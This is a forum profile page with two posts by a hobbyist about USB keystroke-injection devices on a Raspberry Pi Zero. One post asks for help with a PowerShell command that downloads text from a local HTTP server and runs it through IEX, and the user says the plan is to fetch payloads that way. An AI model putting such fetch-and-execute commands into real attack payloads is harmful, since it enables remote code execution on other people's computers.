Jump to content

Frater O.B.L.

Members
  • Posts

    2
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Frater O.B.L.'s Achievements

Newbie

Newbie (1/14)

  1. Hi All, Has anyone though to try and get Twin Duck working on a Raspberry Pi Zero? From what I understand, you can only use one of the RPi 'modules' at once, so you can use g_ether, or g_HID, or g_mass_storage, but not more than one. Which is problematic, since you'd need the HID and Mass Storage modules active to make this work. Any thoughts? OBL
  2. Hi All, I'm looking for help with powershell commands. I've got my duckberry pi working, and the plan is to have a duckyscript use powershell to download payloads from a http or ftp server (which is running on my android phone) on a local network. I've got SimpleHttpServer and Android FTPServer hosting a text file, and they seem to be working, because I can access the test file via browser at ip:port & through FileZilla. The closest I've gotten thus far to making this happen with powershell is this command: powershell "IEX (New-Object Net.Webclient).DownloadString('http://XXX.XXX.XXX.XXX:12345/derp.txt')" The error message I get is: The term 'TEST' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:5 + TEST <<<< + CategoryInfo : ObjectNotFound: (TEST:String) [], CommandNotFoun dException + FullyQualifiedErrorId : CommandNotFoundException Now...the term 'TEST' is the only text within the derp.txt file, and it changes when I change the contents of the text file, so it appears to be able to accessing the right file in the right place. Now, I can't figure out how to download this file. Anyone have suggestions? Also, what would this powershell script look like if I were attempting to access a file at a local ftp server? And if that ftp server required username and password? Thanks! OBL
×
×
  • Create New...